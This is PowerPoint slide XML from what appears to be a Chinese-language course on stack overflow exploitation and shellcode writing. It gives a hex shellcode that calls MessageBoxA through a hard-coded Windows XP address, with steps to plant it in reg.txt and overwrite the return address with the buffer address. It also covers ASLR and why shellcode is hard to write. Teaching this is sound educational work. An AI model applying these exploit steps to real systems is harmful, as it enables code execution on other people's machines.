                      <a:endParaRPr lang="zh-CN" sz="1800" kern="10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ct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>MessageBoxA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>函数，注意，每个机器的该函数的入口地址不同，请按实际值写入。</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="75298" marR="75298" marT="37649" marB="3764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697701">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>FF D0</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="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800" kern="100" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="宋体"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>CALL EAX</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1800" kern="100" dirty="0">
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="宋体"/>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247904124"/>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 presetClass="entr" presetSubtype="2" decel="6000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1+#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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58EC0BB-00B1-4187-AF63-CB46D6082565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000116" y="952029"/>
            <a:ext cx="10729192" cy="2864902"/>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30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>得到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>33 DB 53 68 77 65 73 74 68 77 65 73 74 8B C4 53 50 50 53 B8 EA 07 D5 77 FF D0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>将这段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>reg.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>文件，且在返回地址处写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>的地址可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>来查看得到，也可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>VC6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>的转到反汇编方式来得到：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>0012FAF0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3AAF244-CCF3-4BED-BF8E-2D64D87BA923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1168856" y="4048373"/>
            <a:ext cx="10391712" cy="1944216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBED80BB-7341-4959-B54E-74E2D8E3677B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233489" y="374643"/>
            <a:ext cx="4073552"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第三步：注入</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Shellcode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代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3460801193"/>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1+#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íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58EC0BB-00B1-4187-AF63-CB46D6082565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="2032149"/>
            <a:ext cx="4320480" cy="2520280"/>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30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>下静态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>的地址是准的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>之后增加了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>保护机制，地址就不准，就得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>动态获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C546C59-A417-4275-9416-AA7E1DC01B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5421263" y="1312069"/>
            <a:ext cx="6723195" cy="4392488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34258236"/>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532831" y="3108493"/>
            <a:ext cx="10729192" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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知识点四：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" b="1"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Shellcode</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编写</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2477988441"/>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269135" y="837929"/>
            <a:ext cx="4320480" cy="474140"/>
            <a:chOff x="4269135" y="837929"/>
            <a:chExt cx="4320480" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF07046-8558-4F68-A567-BFF83801B119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269135" y="1312069"/>
              <a:ext cx="4320480"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4966156" y="837929"/>
              <a:ext cx="2926443" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>编写的难点</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="矩形 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6043767-DC6B-4254-9127-2CD5CBDB1CF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132070" y="1603581"/>
            <a:ext cx="10594610" cy="1141338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>由于漏洞发现者在漏洞发现之初并不会给出完整</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，因此掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编写技术就显得尤为重要。但是，要编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>存在很多难点：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="组合 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91ACF003-DDC2-4DC1-9641-220A291D5D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3045821" y="2744919"/>
            <a:ext cx="1622946" cy="1622946"/>
            <a:chOff x="2716147" y="2106202"/>
            <a:chExt cx="1622946" cy="1622946"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="is1ide-Oval 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83FAA890-D65C-4A91-96B5-B20C5FD77C1B}"/>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latin typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28" name="组合 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9591D1B-B590-4932-8AD2-A45F81E18D5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2828972" y="2219027"/>
              <a:ext cx="1397296" cy="1397296"/>
              <a:chOff x="2696934" y="2774952"/>
              <a:chExt cx="1035027" cy="1035027"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="is1ide-Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A082CB79-CC33-4B2A-A0A2-6799058F9F96}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2696934" y="2774952"/>
                <a:ext cx="1035027" cy="1035027"/>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1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="矩形 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB71F8A3-7B9E-4F50-B73D-234A095BB980}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2889315" y="3127087"/>
                <a:ext cx="650261" cy="29637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b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D297A4E-DCAF-4140-953D-FD7B6D45E120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="4541663"/>
            <a:ext cx="4897569" cy="1933879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对一些特定字符需要转码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
